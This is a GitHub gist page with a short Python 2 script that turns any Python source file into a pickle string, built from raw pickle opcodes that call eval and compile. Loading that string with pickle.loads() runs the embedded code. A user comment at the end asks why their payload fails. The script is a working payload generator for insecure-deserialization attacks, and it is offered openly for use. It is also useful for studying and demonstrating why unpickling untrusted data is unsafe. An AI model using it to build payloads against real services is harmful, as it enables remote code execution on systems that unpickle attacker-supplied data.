Created
August 15, 2012 14:36
-
-
Save freddyb/3360650 to your computer and use it in GitHub Desktop.
compile arbitrary python source code into pickle format. will execute on unpickling
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Frederik Braun, Jun 2011 | |
## Contact: <fb(AT)frederik-braun.com> | |
## Licence: WTFPL | |
## Python 2.7x | |
try: | |
import cPickle as pickle | |
except ImportError: | |
import pickle | |
from sys import argv | |
def picklecompiler(sourcefile): | |
""" | |
Usually pickle can only be used to (de)serialize objects. | |
This tiny snippet will allow you to transform arbitrary python source | |
code into a pickle string. Unpickling this string with pickle.loads() | |
will execute the given soruce code. | |
The trick is actually prettey easy: Usually eval() will only accept | |
expressions, thus class and function declarations does not work. | |
Using the work-around of code objects (returned by compile()), we can | |
execute real python source code :) | |
""" | |
sourcecode = file(sourcefile).read() | |
return "c__builtin__\neval\n(c__builtin__\ncompile\n(%sS'<payload>'\nS'exec'\ntRtR." % (pickle.dumps( sourcecode )[:-4],) | |
def usage(): | |
print "usage: ./%s file\n\nfile\tfile to compile into a pickle string" % argv[0] | |
if len(argv) == 2: | |
print repr(picklecompiler(argv[1])) | |
else: | |
usage() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
hello,I try to use this script to pickle my code:
got the payload, and save it to poc.pickle:
but when I try to test the payload with the following code:
I got error:
my question is:
if I am not misunderstood ,this script should support to execute any python code.
but the error is about the function,maybe some issue.
hope your response,thanks!